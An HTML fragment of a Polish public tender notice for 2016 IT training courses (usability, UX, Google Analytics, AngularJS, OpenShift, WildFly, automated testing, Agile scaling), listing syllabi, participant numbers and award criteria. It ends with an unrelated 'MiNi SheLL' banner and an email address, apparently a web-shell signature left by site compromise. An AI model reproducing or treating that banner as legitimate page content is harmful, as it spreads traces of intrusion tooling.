<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Dodatkowy pakiet konsultacji telefonicznych - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> IBUQ FL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1 do SIWZ - Opisie przedmiotu zamówienia.
I.	Nazwa szkolenia: Przygotowanie do certyfikacji IBUQ Foundation Level
II.	Cel: Przygotowanie uczestników do uzyskania certyfikatu IBUQ Foundation Level
III.	Forma szkolenia: wykład, ćwiczenia.
IV.	Czas trwania : min. 14 godzin zegarowych
V.	Miejsce szkolenia : sala zapewniona przez firmę szkolącą na terenie miasta Poznania.
VI.	Termin szkolenia: do ustalenia po wyborze firmy szkolącej; nie później niż do 2016-10-31. 
VII.	Ilość osób: 3
VIII.	Uwaga: w cenie szkolenia wliczona zostaje opłata egzaminacyjna. 
IX.	Program szkolenia - między innymi:
1.	Wstęp do usability i user experience,
2.	Techniki projektowania zorientowane na użytkownika,
3.	Definiowanie wymagań dla aplikacji przygotowywanych dla urządzeń mobilnych,
4.	Narzędzia wspomagające tworzenie oraz weryfikację zgromadzonych wymagań,
5.	Omówienie zasad tworzenia i stosowania makiet oraz narzędzi wspomagających, 
6.	Sposoby analizy i testowania użyteczności,
7.	Standardy, uniwersalne zasady, zalecenia (dobre praktyki) w projektowaniu intefejsów użytkownika,
8.	Projektowanie interakcji, 
9.	Zasady projektowania aplikacji przeznaczonych dla osób niepełnosprawnych, 
10.	Przygotowanie do egzaminu International Board for Usability Qualification - omówienie zasad prowadzenia egzaminu, przeprowadzenie egzaminu próbnego,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Dodatkowy pakiet konsultacji telefonicznych - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> User Experience.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1 do SIWZ - Opisie przedmiotu zamówienia.
I.	Nazwa szkolenia: Projektowanie zorientowane na użytkownika,
II.	Cel:  Przygotowanie osób do wsparcia zespołu projektującego i rozwijającego funkcjonalność portalu internetowego świadczącego usługi administracji publicznej dla obywateli. 
III.	Forma szkolenia: wykłady, warsztaty, ćwiczenia.
IV.	Czas trwania : min. 14 godzin zegarowych.
X.	Miejsce szkolenia: sala zapewniona przez firmę szkolącą na terenie miasta Poznania.
V.	Termin szkolenia: do ustalenia po wyborze firmy szkolącej; nie później niż do 2016-10-31. 
VI.	Ilość osób: 4
VII.	Program szkolenia - między innymi:
1.	Wstęp do projektowania zorientowanego na użytkownika,
2.	Sposoby tworzenia użytecznych projektów,
3.	Sposób prowadzenia efektywnej analizy wymagań, 
4.	Standardy, zalecenia, metody, dobre praktyki, tworzenia makiet i prototypów
5.	Narzędzia wspomagające pracę,
6.	Sposoby testowania użyteczności i satysfakcji użytkownika.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Dodatkowy pakiet konsultacji telefonicznych - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Google Analytics.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1 do SIWZ - Opisie przedmiotu zamówienia.
I.Nazwa szkolenia: Praktyczne wykorzystanie Google Analytics
II.Cel szkolenia: Poznanie możliwości zastosowania Google Analitisc, nabycie praktycznych umiejętności wykorzystania narzędzia do analizy zachowań użytkowników, możliwości dostarczenia danych do późniejszego ukierunkowania zachowań użytkowników, zwiększenia użyteczności portalu oraz widoczności w sieci.
III.Forma szkolenia: wykład, ćwiczenia.
IV.Czas trwania : min. 14 godzin zegarowych.
V.Miejsce szkolenia : sala zapewniona przez firmę szkolącą na terenie miasta Poznania.
VI.Termin szkolenia: do ustalenia po wyborze firmy szkolącej; nie później niż do 2016-11-30. 
VII.	Ilość osób: 3
VIII.	Program szkolenia - między innymi:
1. Wstęp do wykorzystania narzędzia Google Analytics oraz analizy zachowań w internecie,
2. Wstęp do prac z Google Analytics (m.in. założenie kont użytkowników, poprawna konfiguracja narzędzia,założenie profilu dla strony www, omówienie dostępnych funkcji i wskaźników GA, 
3. Przygotowanie prostych i zaawansowanych raportów Google Analytics, interpretacja, wyników ukierunkowana na przygotowanie zaleceń zmian dla serwisu www,
4. Możliwości zastosowania GA (możliwe cele),
5. Wykorzystanie Google Analytics w pracy z AdWords,
6. Optymalizacja kampanii z wykorzystaniem Google Tag Manager,
7. Śledzenie prowadzonych kampanii reklamowych,
9. Zastosowanie i implementacja modułu ecommerce,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Dodatkowy pakiet konsultacji telefonicznych - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> AngularJS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1 do SIWZ - Opisie przedmiotu zamówienia.
I.	Nazwa szkolenia: Programowanie z wykorzystaniem AngularJS
II.	Forma szkolenia: wykłady max 50% i warsztaty min 50 % czasu trwania szkolenia.
III.	Czas trwania : min. 21 godzin zegarowych
IV.	Miejsce szkolenia : w sali firmy szkolącej na terenie miasta Poznania lub w siedzibie zamawiającego.
V.	Termin szkolenia: do ustalenia po wyborze firmy szkolącej; nie później niż do 2016-12-01. 
VI.	Ilość osób: 12
VII.	Program szkolenia:
1. Krótka powtórka z JavaScript obejmująca:
	Funkcje - jaka jest ich rola
	Object Oriented  (custom class definition, prototype extensions, prototypal inheritance, encapsulation/access control)
	Dynamic typing
	Scopes
	Closures
	Contexts
2. Wstęp do AngularJS (historia, idea, zastosowanie, architektura)
3. Wyrażenia
	Formularze
	Filtry (wbudowane i definiowanie własnych filtrów)
	Szablony
	Data binding ( w tym bindowanie dwustronne)
4. Kontrolery
	Idea
	Dependency Injection
	Współdzielenie danych przez kontrolery
5. Zakresy
	Zakresy jako model danych
	Hierarchia zakresów
	Eventy
	Cykl życia
6. Dyrektywy
	Kompilacja i linkowanie
	Komponenty
	Dyrektywy wbudowane
	Dyrektywy własne (basics, templates, template urls, template cache, restrictions, linking function, directive-to-controllers communications, directive-to-directive communications, directive isolate scopes, transclusion)
7. Wstrzykiwanie zależności
	Adnotacje
	Metody fabrykujące
8. Serwisy
	Wbudowane serwisy
	Definiowanie własnych serwisów
9. Testowanie
	Jednostkowe
	End-to-End
10. Moduły
	Lokacje
	Routing
11. Budowanie i wdrażanie
	Yeoman
	Grunt
	Bower
12. Konfiguracja
	Routing (routeProvider, routeParams, redirectTo, resolve, routeChangeError, life cycle,  ui-router)
	Bootstrap
13. Funkcjonalności
	Elementy
	Promises
	Animacja
14. Wzorce i najlepsze praktyki projektowe
	Komponenty
	Kontenery
	Routing
	Szablony
	Komunikacja z serwerem i ładowanie danych
	Sources minification.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Dodatkowy pakiet konsultacji telefonicznych - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> OpenShift.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1 do SIWZ - Opisie przedmiotu zamówienia.
I.	Nazwa  szkolenia: Administracja OpenShift Enterprise firmy Red Hat
II.	Forma szkolenia: wykłady max 50% i warsztaty min 50 % czasu trwania szkolenia.
III.	Czas trwania : min. 14 godzin zegarowych
IV.	Miejsce szkolenia : w sali firmy szkolącej na terenie miasta Poznania lub w siedzibie zamawiającego.
V.	Termin szkolenia: do ustalenia po wyborze firmy szkolącej; nie później niż do 2016-12-01. 
VI.	Ilość osób: 4
VII.	Program szkolenia:
1.Wprowadzenie do OpenShift? 
2.Architektura Red Hat OpenShift.
3.Wdrażanie OpenShift :
Wykonywanie automatycznego wdrożenia OpenShift Enterprise.
4.Wdrożenie hosta infrastruktury 
Instalacja i konfiguracja pośrednika OpenShift Enterprise.
5.Wdrożenie węzła
Instalacja i konfiguracja węzła OpenShift Enterprise.
6.Zarządzanie zasobami. 
Konfiguracja limitów
Tworzenie i konfigurowanie dystryktów.
7.Wdrażanie aplikacji. 
Wdrażanie i zarządzanie aplikacjami na OpenShift Enterprise przy użyciu narzędzi linii poleceń.
8.Używanie quickstart. 
Używanie przygotowanych aplikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Dodatkowy pakiet konsultacji telefonicznych - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> WildFly.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1 do SIWZ - Opisie przedmiotu zamówienia.
I.	Nazwa szkolenia: Administrowanie serwerem WildFly
II.	Forma szkolenia: wykłady max 50% i warsztaty min 50 % czasu trwania szkolenia.
III.	Czas trwania : min. 21 godzin zegarowych
IV.	Miejsce szkolenia : w sali firmy szkolącej na terenie miasta Poznania lub w siedzibie zamawiającego.
V.	Termin szkolenia: do ustalenia po wyborze firmy szkolącej; nie później niż do 2016-12-01. 
VI.	Ilość osób: 4
VII.	Program szkolenia:
1.	Instalacja i zarządzanie serwerem WildFly
	 Tryb samodzielny i domeny
	 Konfiguracja domeny
2.	Architektura serwera
	Undertow
	Mikrojądro
3.	Administracja Serwerem WildFly
	Struktura katalogów
	Podsystemy usługowe
	Kontener webowy
	Konsola CLI
4.	Konfiguracja JNDI
	Architektura
	Zarządzanie
5.	Instalacja aplikacji webowej
	Zrozumienie struktury aplikacji WAR i EAR
	Deploy
	Świadomy wybór podejścia
	System logowania
	Bezpieczeństwo
	Zarządzanie aplikacjami
6.	Instalacja komponentów EJB
	Monitorowanie
7.	Bezpieczeństwo
	Konfiguracja
	Zarządzanie
8.	Konfiguracja połączeń do baz danych
	Źródła danych
	Pule połączeń
9.	Konfiguracja podsystemu JMS
	Queue i Topic
	Konfiguracja
	Połączenie
	Przetwarzanie komunikatów
	Konfiguracja HornetQ
10.	Obsługa transakcji
	Transakcje rozproszone
	Konfiguracja
11.	Zagadnienia High Availability
	Teoria klastrowania
	Konfiguracja
	Replikacja i failover
	mod_cluster
	Cache w klastrze
12.	Monitorowanie
	Narzędzia
	Monitorowanie poszczególnych zasobów
	Alerty
	 JMX.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Dodatkowy pakiet konsultacji telefonicznych - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Testowanie-auto.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1 do SIWZ - Opisie przedmiotu zamówienia.
I.	Nazwa szkolenia: Całościowe podejście do testowania automatycznego dla programistów
II.	Forma szkolenia: wykłady max 50% i warsztaty min 50 % czasu trwania szkolenia.
III.	Czas trwania : min. 21 godzin zegarowych
IV.	Miejsce szkolenia : w sali firmy szkolącej na terenie miasta Poznania lub w siedzibie zamawiającego.
V.	Termin szkolenia: do ustalenia po wyborze firmy szkolącej; nie później niż do 2016-12-01. 
VI.	Ilość osób: 12
VII.	Program szkolenia:
1.	Podstawy testowania
1.1.	Strategia racjonalnego testowania: CO x PO CO x JAK
1.1.1.	 Zakres testów
1.1.1.1.	Jednostkowe
1.1.1.2.	Integracyjne
1.1.1.3.	End 2 End
1.1.2.	 Rola testów
1.1.2.1.	Akceptacyjne
1.1.2.2.	Regresyjne
1.1.3.	 Skupienie testów
1.1.3.1.	Testy funkcjonalne
1.1.3.2.	Testy bezpieczeństwa
1.1.3.3.	Testy wydajności
1.2.	Wybór strategii testowania w projekcie
1.3.	Strategia budowania piramidy testów
2.	Projektowanie przypadków testowych
2.1.	Podejście do dokumentowania testów
2.1.1.	 User Story i Scenariusze akceptacyjne
2.1.2.	  Wykonywalne specyfikacje - techniki Behavior Driven Development
2.2.	 Testowanie przypadków granicznych
2.2.1.	 Nacisk na testy jednostkowe w celu osiągnięcia wysokiego pokrycia testami
2.2.2.	 Architektura wspierająca wysokie pokrycie testami
2.2.3.	 Modelowanie logiki przy pomocy Building Blocks z Domain Driven Design
2.3.	Powtarzalność testów, wyeliminowanie losowości z testów
2.4.	Najlepsze praktyki tworzenia przypadków testowych
3.	Architektura aplikacji otwartej na testowanie
3.1.	Rozwarstwienie logiki na aplikacyjną i domenową
3.2.	Piramida testów - jak ją interpretować w kontekście warstw
3.2.1.	 Logika aplikacji - testy End 2 End
3.2.2.	 Logika domenowa - testy jednostkowe
3.3.	Kiedy warto stosować zaślepki (Mock) a kiedy jest to zbędny koszt
4.	Najlepsze techniki testowania - ogólne projektowanie testów, które można utrzymywać w przyszłości
4.1.	Wprowadzenie
4.1.1.	 Czego nie testować
4.1.2.	 Struktury przypadków testowych
4.2.	Organizacja kodu testowego
4.2.1.	 Klasa testowa per klasa produkcyjna
4.2.2.	 Klasa testowa per funkcjonalność
4.2.3.	 Klasa testowa per setup
4.2.4.	 Testy parametryzowane
4.3.	Przygotowanie stanu (test fixture setup)
4.3.1.	 Testy wykorzystujące źródło danych (data-driven testing)
4.3.2.	 Użycie wzorca Asemblera (odmiana Builder Design Pattern)
4.3.3.	 Wzorce i szablony
4.3.3.1.	Object Mother
4.3.3.2.	Assembler (aka Builder) - sensowne i mniej sensowne podejścia
4.4.	Weryfikacja
4.4.1.	 Value Object, weryfikacja przez equals
4.4.2.	 Własne asercje
4.4.3.	 Weryfikacja przy użyciu specyfikacji (Matcher object)
4.4.4.	 Upraszczanie asercji z użyciem Assert Object
4.4.5.	 Poprawna weryfikacja przypadków negatywnych
4.4.6.	 Wzorce i szablony
4.4.6.1.	Assert Object
4.5.	Uprzątniecie po teście (fixture teardown)
4.5.1.	 Kiedy warto stosować
4.5.2.	 Manualne
4.5.3.	 Automatyczne
4.5.4.	 Wzorce i szablony
4.6.	Antywzorce testowania (ponad 20 typowych błędów i pułapek)
4.7.	Wykrywanie Zapachów złego kodu testowego
4.7.1.	 Delikatne testy (fragile)
4.7.2.	 Nieczytelne testy
4.7.3.	 Wolne testy
4.7.4.	 Testy niedeterministyczne
4.8.	Techniki organizacji kodu testowego - standardy, wzorce i najlepsze praktyki
4.8.1.	 Wsparcie refaktoryzacji ze strony IDE
4.8.2.	 Techniki refaktoryzacji kodu testowego
4.8.3.	 Efektywne sposoby utrzymania dużej liczby testów
5.	Testowanie jednostkowe
5.1.	Szablony testów w xUnit
5.2.	Tworzenie własnych asercji
5.3.	Techniki: Mock, Stub, Fake
5.3.1.	 Dobór technik do potrzeb - czym się kierować
5.3.2.	 Przykłady implementacji w Mockito
5.4.	Mockowanie
5.4.1.	 Zalety testowania w izolacji
5.4.2.	 Nagrywanie zachowania
5.4.3.	 Weryfikacja wywołań
5.4.4.	 Antywzorce testów wykorzystujące mockowanie
5.5.	Co sprawia że czas poświęcony na napisanie testu zwróci się
5.6.	Testability - podatność kodu na testy
5.6.1.	 Jak pisać kod, który daje się testować
5.6.2.	 Najlepsze praktyki: SOLID, GRASP
5.6.3.	 Wybrane wzorce projektowe, które zwiększają testability: Factory, Strategy, Value Object
5.6.4.	 Pułapki i typowe błędy
5.6.5.	 Code smell - zapachy nietestowalnego kodu
6.	Test Driven Development
6.1.	 Cykl czerwony-zielony-refaktoring
6.2.	 Wady i zalety TDD
6.3.	Kiedy warto, dla kogo jest TDD
6.4.	Ewolucyjny sposób rozwój kodu
6.5.	Podstawowe techniki refactoringu
7.	Testowanie akceptacyjne
7.1.	Technika User Story
7.2.	Tworzenie testów akceptacyjnych na podstawie User Story
7.3.	Zyski i koszty różnych technik testowania akceptacyjnego
7.4.	Efektywne narzędzia wspierające:
7.4.1.	 Testowanie poprzez warstwę GUI
7.4.2.	 Testowanie poprzez warstwę serwisów
7.4.3.	 Przygotowywanie stanu początkowego
7.5.	Podejścia
7.5.1.	 Testowanie przez GUI
7.5.1.1.	Selenium
7.5.2.	 Testowanie przez warstwę serwisów (API systemu)
7.5.2.1.	Zdalne wywołanie obiektów (Spring Remoting Remote EJB Seam - do wyboru)
7.5.3.	 Unifikacja podejść dzięki Agentom BDD
8.	Wstęp do Behaviour Driven Development
8.1.	Zalety bliskiej współpracy z klientem
8.1.1.	 Rola dostawcy, rola klienta w testach akcpetacyjneych
8.2.	Tworzenie aplikacji podejściem BDD
8.3.	Podejście dwuwarstwowe
8.3.1.	 Warstwa Flow - User Story
8.3.2.	 Warstwa Automatyzacji interakcji z systemem
8.4.	Narzędzia i wzorce
8.4.1.	 JBehave Spock SpecFlow - najlepsze praktyki
8.4.1.1.	Integracja z Selenieum
8.4.2.	 Page Object - modelowanie użytkownika
8.5.	Technika ujednolicania testów wykonywanych poprzez GUI i Servisy - Agenty
9.	Wstęp do Specification by Example
9.1.	Wzorce i techniki tworzenie wykonywalnych specyfikacji
9.2.	Podejście trójwarstwowe
9.2.1.	 Warstwa Specyfikacji - cele biznesowe
9.2.2.	 Warstwa Flow - User Story
9.2.3.	 Warstwa Automatyzacji interakcji z systemem
9.3.	Narzędzia automatyzacji
10.	Kompleksowy proces - podsumowanie szkolenia
10.1.	Strategiczny design - Domain Driven Design
10.2.	Korzystanie z user story, BDD i TDD w codziennej pracy
10.3.	Automatyzacja - korzystanie z serwera Continous Integration
10.4.	Narzędzia
10.4.1.	 Java: JUnit TestNG, JBehave Spock, Selenium
10.4.2.	NET: nUnit, NDbUnit, nBehave, nSubstitute, nCover, Selenium
10.5.	Wykorzystanie najlepszych praktyk, wskazanie typowych błędów i pułapek
10.6.	Przykładowy projekt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Dodatkowy pakiet konsultacji telefonicznych - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Skalowanie Agile.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1 do SIWZ - Opisie przedmiotu zamówienia.
I.	Nazwa szkolenia: Skalowania Agile
II.	Forma szkolenia: warsztaty.
III.	Czas trwania : min. 7 godzin zegarowych.
IV.	Miejsce szkolenia : w sali firmy szkolącej na terenie miasta Poznania lub w siedzibie zamawiającego.
V.	Termin szkolenia: do ustalenia po wyborze firmy szkolącej; nie później niż do 2016-12-01. 
VI.	Ilość osób: 10
VII.	Program szkolenia:
1.	Wprowadzenie do Agile i Lean
2.	Które elementy procesu można skalować?
3.	Dlaczego skalowanie jest trudne?
4.	Podział metod skalowania
5.	Scrum of Scrums
6.	Model Spotify
7.	LeSS
8.	SAFe
9.	Scrum at Scale.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Dodatkowy pakiet konsultacji telefonicznych - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com